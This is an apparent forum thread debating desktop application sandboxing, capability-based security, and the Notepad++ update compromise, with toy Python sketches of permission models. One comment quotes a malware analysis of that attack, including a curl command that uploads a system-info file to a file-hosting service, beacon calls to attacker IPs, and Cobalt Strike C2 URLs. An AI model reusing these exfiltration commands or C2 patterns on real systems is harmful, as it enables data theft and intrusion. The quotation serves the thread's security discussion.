There is no reason for a tool to implicitly access my mounted cloud drive directory and browser cookies data.
Linux has this capability, of course. And it seems like macOS prompts me a lot for "such-and-such application wants to access this or that". But I think it could be a lot more fine-grained, personally.
Linux people are very resistant to this, but the future is going to be sandboxed iOS style apps. Not because OS vendors want to control what apps do, but because users do. If the FOSS community continues to ignore proper security sandboxing and distribution of end user applications, then it will just end up entirely centralised in one of the big tech companies, as it already is on iOS and macOS by Apple.
iOS and Android both implement these security policies correctly. Why can't desktop operating systems?
There is no such thing as computer security, in general, at this point in history.
Not sure how something can be called a sandbox without the actual box part. As Siri is to AI, Flatpak is to sandboxes.
Indeed. Why lock your car door as anyone can unlock and steal it by learning lock-picking?
I think you mean a lot of flak? Slack would kind of be the opposite.
You can use the underlying sandboxing with bwrap. A good alternative is firejail. They are quite easy to use.
I prefer to centralize package management to my distro, but I value their sandboxing efforts.
Personally, I think it's time to take sandboxing seriously. Supply chain attacks keep happening. Defense in depth is the way.
That subtlety is important because it explains how the backdoors have snuck in — most people feel safe because they are not targeted, so there's no hue and cry.
Think about it from a real world perspective.
I knock on your door. You invite me to sit with you in your living room. I can't easily sneak into your bedroom. Further, my temporary access ends as soon as I leave your house.
The same should happen with apps.
When I run 'notepad dir1/file1.txt', the package should not sneakily be able to access dir2. Further, as soon as I exit the process, the permission to access dir1 should end as well.
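That model could be sketched in a few lines of Python. This is a toy illustration, not a real OS API; scoped_access and can_open are made-up names standing in for a kernel-enforced mechanism.

```python
import os
from contextlib import contextmanager

# Toy illustration of per-invocation permissions: the grant covers
# one directory and vanishes when the invocation ends.
@contextmanager
def scoped_access(allowed_dir):
    grants = {os.path.realpath(allowed_dir)}

    def can_open(path):
        real = os.path.realpath(path)
        return any(real == d or real.startswith(d + os.sep) for d in grants)

    try:
        yield can_open
    finally:
        grants.clear()  # the permission dies when the process exits

# 'notepad dir1/file1.txt' would be granted dir1 and nothing else:
with scoped_access("dir1") as can_open:
    assert can_open("dir1/file1.txt")       # what the user asked for
    assert not can_open("dir2/secret.txt")  # sneaky access denied
```

In a real system the enforcement would of course live in the kernel or a broker process, not in the app's own address space.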
The most popular desktop OSes have decades of pre-existing software and APIs to support and, like a lot of old software, the debt of choices made a long time ago that are now hard/expensive to put right.
The major desktop OSes are to some degree moving in this direction now (note the ever increasing presence of security prompts when opening "things" on macOS etc etc), but absent a clean sheet approach abandoning all previous third party software like the mobile OSes got, this arguably can't happen easily over night.
For FreeBSD there is capsicum, but it seems a bit inflexible to me. Would love to see more experiments on Linux and the BSDs for this.
We can make operating systems where the islands can interact. It just needs to be opt-in instead of opt-out. A bad Notepad++ update shouldn't be able to invisibly read all of Thunderbird's stored emails, or add backdoors to projects I'm working on, or cryptolocker my documents. At least not without my say-so.
I get that permission prompts are annoying. There are some ways to do the UI aspect in a better way - like have the open file dialogue box automatically pass along permissions to the opened file. But these are the minority of cases. Most programs only need to access to their own stuff. Having an OS confirmation for the few applications that need to escape their island would be a much better default. Still allow all the software we use today, but block a great many of these attacks.
Naturally, even Flatpak on Linux suffers from this, as legacy software simply doesn't have a concept of permission models, and this cannot be bolted on after the fact.
That's what I do with my sandbox right now.
In such a scenario, you can launch your IDE from your application manager and then only give write access to specific folders for a project. The IDE's configuration files can also be stored in isolated directories. You can still access them with your file manager software or your terminal app which are "special" and need to be approved by you once (or for each update) as special. You may think "How do I even share my secrets like Git SSH keys?". Well that's why we need services like the SSH Agent or Freedesktop secret-storage-spec. Windows already has this btw as the secret vaults. They are there since at least Windows 7 maybe even Vista.
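The agent idea can be sketched in Python. Everything here is hypothetical naming, and HMAC merely stands in for a real SSH signature; the point is that apps submit data to be signed and never see the key itself.

```python
import hashlib
import hmac

# Toy agent: the private key lives only inside this trusted process.
class Agent:
    def __init__(self, key_material):
        self._key = key_material  # never handed out to callers

    def sign(self, data):
        # Sandboxed apps call this; HMAC stands in for an SSH signature.
        return hmac.new(self._key, data, hashlib.sha256).hexdigest()

agent = Agent(b"ssh-private-key-material")
signature = agent.sign(b"git push payload")
# The app now holds a signature for its Git operation, but at no
# point did the key itself cross into the app's sandbox.
```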
Sound engineers don't use lossy formats such as MP3 when making edits in preproduction work, as it's intended for end users and would degrade quality cumulatively. In the same way, someone working on software shouldn't be required to use an end-user consumption system when they are at work.
It would be unfortunate to see the nuance missed: just because a system isn't 'new' doesn't mean it needs to be scrapped.
A slightly more advanced model, which is the default for OSes today, is to have a notion of a "user", and then you grant certain permissions to a user. For example, for something like Unix, you have the read/write/execute permissions on files that differ for each user. The security mentioned above just involves defining more such permissions than were historically provided by Unix.
But the holy grail of security models is called "capability-based security", which is above and beyond what any current popular OS provides. Rather than the current model, which just involves talking about what a process can do (the verbs of the system), a capability involves talking about what a process can perform an operation on (the nouns of the system). A "capability" is an unforgeable cryptographic token, managed by the OS itself (sort of like how a typical OS tracks file handles), which grants access to a certain object.
Crucially, this then allows processes to delegate tasks to other processes in a secure way. Because tokens are cryptographically unforgeable, the only way that a process could have possibly gotten the permission to operate on a resource is if it were delegated that permission by some other process. And when delegating, processes can further lock down a capability, e.g. by turning it from read/write to read-only, or they can e.g. completely give up a capability and pass ownership to the other process, etc.
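As a rough Python sketch — a toy model, nothing like a real kernel implementation, with Capability and attenuate as invented names — delegation with attenuation might look like this:

```python
import secrets

# Toy capability table, playing the role the kernel would play.
_table = {}

class Capability:
    def __init__(self, resource, rights):
        # An unguessable random token stands in for "unforgeable".
        self.token = secrets.token_hex(16)
        _table[self.token] = (resource, frozenset(rights))

    def attenuate(self, keep):
        # Delegation can only narrow rights, never widen them.
        resource, rights = _table[self.token]
        return Capability(resource, rights & frozenset(keep))

    def use(self, right):
        resource, rights = _table[self.token]
        if right not in rights:
            raise PermissionError(f"capability lacks {right!r}")
        return resource

rw = Capability("/home/alice/notes.txt", {"read", "write"})
ro = rw.attenuate({"read"})   # hand a read-only view to another process
assert ro.use("read") == "/home/alice/notes.txt"
```

A real implementation would keep the table in the kernel and pass tokens over IPC, so a process could only ever hold capabilities it was explicitly given.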
So when it's all said and done, I do not expect practical levels of actual isolation to be that great.
Are they wrong? Do gradations of vulnerability exist? Is there only one threat model, “you’re already screwed and nothing matters”?
I had been thinking of a way to avoid the CloudABI launcher. The entitlements would instead be in the binary object file, and only reference command-line parameters and system paths. I have also thought of an elaborate scheme with local code signing to verify that only user/admin-approved entitlements get lifted to capabilities.
However, CloudABI got discontinued in favour of WebAssembly (and I got side-tracked...)
Redox is also moving towards having capabilities mapped to fd's, somewhat like Capsicum. Their recent presentation at FOSDEM: https://fosdem.org/2026/schedule/event/KSK9RB-capability-bas...
The data doesn't support the suggestion that this is happening on any mass scale. When Apple made app tracking opt-in rather than opt-out in iOS 14 ("App Tracking Transparency"), 80-90% of users refused to give consent.
It does happen more when users are tricked (dare I say unlawfully defrauded?) into accepting, such as when installing Windows, when launching Edge for the first time, etc. This is why externally-imposed sandboxing is a superior model to Zuck's pinky promises.
Try to run GIMP inside a container, for example: you'll have to give it access to your ~/Pictures or whatever for it to be useful.
Compare that to some photo-editing applications on Android/iOS, which can work without filesystem access by getting the file through the OS file picker.
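That picker pattern is easy to sketch in Python: the trusted side (standing in for the OS picker) opens the file the user chose and hands the app only an open descriptor, so the app never needs a blanket ~/Pictures grant. All names here are made up for illustration.

```python
import os
import tempfile

def trusted_picker(path):
    # Runs with the user's privileges: the user explicitly chose this file.
    return os.open(path, os.O_RDONLY)

def sandboxed_app(fd):
    # The app receives an already-open descriptor, never a path,
    # so it can edit one photo without any filesystem access.
    with os.fdopen(fd, "rb") as f:
        return f.read()

# Demo with a temp file standing in for a photo:
with tempfile.NamedTemporaryFile(delete=False) as tmp:
    tmp.write(b"pixels")
try:
    data = sandboxed_app(trusted_picker(tmp.name))
finally:
    os.unlink(tmp.name)
assert data == b"pixels"
```

This is essentially what desktop portals do: the picker runs outside the sandbox and only the chosen file crosses the boundary.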
Sure, in theory, SELinux could prevent this. But seems like an uphill battle if my policies conflict with the distro’s. I’d also have to “absorb” their policies’ mental model first…
Asking continuously is worse than not asking at all…
> In the same way someone working on software shouldn't be required to use an end-user consumption system when they are at work.
I'm worried that many software developers (including me, a lot of the time) will only enable security after exhausting all other options. So long as there's a big button labeled "Developer Mode" or "Run as Admin" which turns off all the best security features, I bet lots of software will require that to be enabled in order to work.
Apple has quite impressive frameworks for application sandboxing. Do any apps use them? Do those DAWs that sound engineers use run VST plugins in a sandbox? Or do they just dyld + call? I bet most of the time it's the latter. And look at this Notepad++ attack. The attack would have been stopped dead if the update process validated digital signatures. But no, it was too hard, so instead they got their users' computers hacked.
I'm a pragmatist. I want a useful, secure computing environment. Show me how to do that without annoying developers and I'm all in. But I worry that the only way a proper capability model would be used would be by going all in.
What happens if the user presses ^O, expecting a file open dialog that could navigate to other directories? Would the dialog be somehow integrated to the OS and run with higher permissions, and then notepad is given permissions to the other directory that the user selects?
Or the easier way with an external tool is using Sandboxie: https://sandboxie-plus.com/
But fine, lock Windows down for normal users, as long as I can still disable all the security. We don't need another Apple.
It's still worth solving one of these problems.
Because security people often don't know the balance between security and usability, and we end up with software that is crippled and annoying to use.
Linux people are NOT resistant to this. Atomic desktops are picking up momentum and people are screaming for it. Snaps, flatpaks, appimages, etc. are all moving in that direction.
As for plain development, sadly, the OS developers are simply ignoring the people asking. See:
https://github.com/containers/toolbox/issues/183
https://github.com/containers/toolbox/issues/348
https://github.com/containers/toolbox/issues/1470
I'll leave it up to you to speculate why.
Perhaps getting a bit of a black eye and some negative attention from the Great Orange Website(tm) can light a fire under some folks.
There’s also a similar photos picker (PHPicker) which is especially good from 2023 on. Signal uses this for instance.
When started, it sends a heartbeat containing system information to the attackers. This is done through the following steps:
3. Then it uploads the 1.txt file to the temp[.]sh hosting service by executing the curl.exe -F "file=@1.txt" -s https://temp.sh/upload command;
4. Next, it sends the URL of the uploaded 1.txt file by using curl.exe --user-agent "https://temp.sh/ZMRKV/1.txt" -s http://45.76.155[.]202
-- The Cobalt Strike Beacon payload is designed to communicate with the cdncheck.it[.]com C2 server. For instance, it uses the GET request URL https://45.77.31[.]210/api/update/v1 and the POST request URL https://45.77.31[.]210/api/FileUpload/submit.
-- The second shellcode, which is stored in the middle of the file, is the one that is launched when ProShow.exe is started. It decrypts a Metasploit downloader payload that retrieves a Cobalt Strike Beacon shellcode from the URL https://45.77.31[.]210/users/admin

My experience with Android apps seems to be different. Every other app seems to be asking for contacts, calling, or access to files.
But when the choice is between using the app with such spyware in it, or not using it at all, people do accept the outrageous permissions the spyware needs.
- You invite someone to sit in your living room
- There must have been a reason to begin with (or why invite them at all)
- Implied (at least limited) trust of whoever was invited
- Access enabled and information gained heavily depends on house design
- May have to walk past many rooms to finally reach the living room
- Significant chances to look at everything in your house
- Already allows skilled appraiser to evaluate your theft worthiness
- Many techniques may allow further access to your house
- Similar to digital version (leave something behind)
- Small digital object accessing home network
- "Sorry, I left something, mind if I search around?"
- Longer con (advance to next stage of "friendship" / "relationship", implied trust)
- "We should hang out again / have a cards night / go drinking together / etc..."
- Flattery "Such a beautiful house, I like / am a fan of <madlibs>, could you show it to me?"
- Already provides a survey of your home security
- Do you lock your doors / windows?
- What kind / brand / style do you have?
- Do you tend to just leave stuff open?
- Do you have onsite cameras or other features?
- Do you easily just let anybody into your house who asks?
- General cleanliness and attention to security issues
- In the case of Notepad++, they would also be offering you a free product
- Significant utility vs alternatives
- Free
- Highly recommended by many other "neighbors"
- In the case of Notepad++, they themselves are not actively malicious (or at least not known to be)
- Single developer
- Apparently frazzled and overworked by the experience
- Makes what updates they can, while also supporting a free product for millions.
- It doesn't really work with the friend you invite in scenario (more like they sneezed in your living room or something)

Basically a thing that I could assign 1) apps and 2) content to. Apps can access all content in all circles they are assigned to. Circles can overlap arbitrarily, so you can do things like having apps A, B, C share access to documents X, Y but only A, B have access to Z, etc.
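That circles idea could be modeled in a few lines of Python (a purely illustrative data layout, not any existing API):

```python
# Toy "circles" model: an app can access an item iff they share a circle.
circles = {
    "work":    {"apps": {"A", "B", "C"}, "content": {"X", "Y"}},
    "private": {"apps": {"A", "B"},      "content": {"Z"}},
}

def can_access(app, item):
    return any(app in c["apps"] and item in c["content"]
               for c in circles.values())

assert can_access("C", "X")       # A, B, C all share "work" with X and Y
assert not can_access("C", "Z")   # Z is only in "private"; C is not there
```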